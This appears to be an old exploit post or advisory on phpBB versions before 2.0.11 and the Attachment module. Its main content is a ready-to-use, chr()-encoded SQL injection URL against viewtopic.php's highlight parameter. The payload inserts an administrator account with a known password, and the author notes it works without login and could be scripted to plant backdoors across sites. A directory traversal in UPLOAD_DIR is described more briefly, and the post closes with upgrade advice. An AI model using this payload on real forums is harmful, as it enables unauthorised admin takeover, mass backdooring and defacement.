phpbb2011.txt

`Phpbb: All vulnerable all except 2.0.11  
Attachment module: All version vulnerable   
  
Howdark update opened wide my eyes with his nice exploit:   
  
Bugtraq id: 10701   
  
-----  
viewtopic.php?t=1&highlight=%2527  
-----   
  
Looking at the code I saw that was possible inject any type of Sql query   
with a multiple char() functions.   
  
The following code can add an username with admin rights executing this   
query:   
  
INSERT INTO   
phpbb_users(user_id,user_active,username,user_password,user_level) VALUES   
('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1')   
  
And will be added to phpbb_users a new user with admin rights.   
  
*Note we can only execute a working query if we know the tables name. If not   
we can't. So this work only with a standard installation (usually 95% of   
websites ;-)   
  
username: ze3lock  
pass: thepass   
  
The exploit can be run without being logged in and then you can have access   
with username. So it's quite simple to make it part of a script that could   
make backdoors around the web.   
  
For make it working just use the id of a working thread (in this case the   
thread is 30 - you can see it from the message)   
  
--- Code start ----   
  
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr   
(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)   
%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25   
2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252   
echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25   
2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2   
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2   
52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2   
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%   
252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%   
252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%   
252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)   
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108   
)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32   
)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%25   
2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech   
r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39   
)%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108)   
%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2   
52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec   
hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr   
(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98   
)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%25   
2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec   
hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(   
41))%252e%2527   
  
--- code end ---   
  
------------ Attach Module ----------------   
  
  
In the attach module, I found a directory traversal in the "UPLOAD_DIR"   
field.   
  
This is the directory where all attachments are supposted to be uploaded.   
  
The field accept any kind of character so you can put instead of 'files'   
'../../' and all the attachments will be uploaded in the '../..? directory.   
  
That's really dangerous for defacements threat.   
  
  
--------------- Suggestion ------------------   
  
Please, upgrade to version 2.0.11 and add an input validation to UPLOAD_DIR   
field in attach module.   
  
Zeelock   
  
`